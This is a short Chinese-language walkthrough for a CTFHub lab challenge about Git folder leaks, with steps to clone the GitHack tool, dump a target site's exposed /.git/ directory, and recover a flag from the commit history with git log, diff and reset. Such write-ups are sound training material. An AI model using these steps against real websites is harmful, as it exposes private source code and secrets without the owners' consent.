CTFHUB-技能树-Git泄露-Log

当前大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞。请尝试使用BugScanTeam的GitHack完成本题

工具

步骤

  • 获取工具,
git clone https://github.com/BugScanTeam/GitHack.git
  • 获取工具--反代
git clone https://github.bravexist.cn/https://github.com/BugScanTeam/GitHack.git
  • 使用工具处理git泄露情况,记得添加端口号
python2 GitHack.py <url>(url格式:http(s)://XXX/.git/)
  •  查看结果
cd dist
cd xxxx
ls -a ./git
  • 使用git log 查看历史记录
git log
  •  比较 add flag
git diff xxx
  • 或者直接切换到 add flag ,直接查看txt里的flag
git reset --hard xxxx
cat xxx.txt
  • 得到了flag

 

阅读剩余
THE END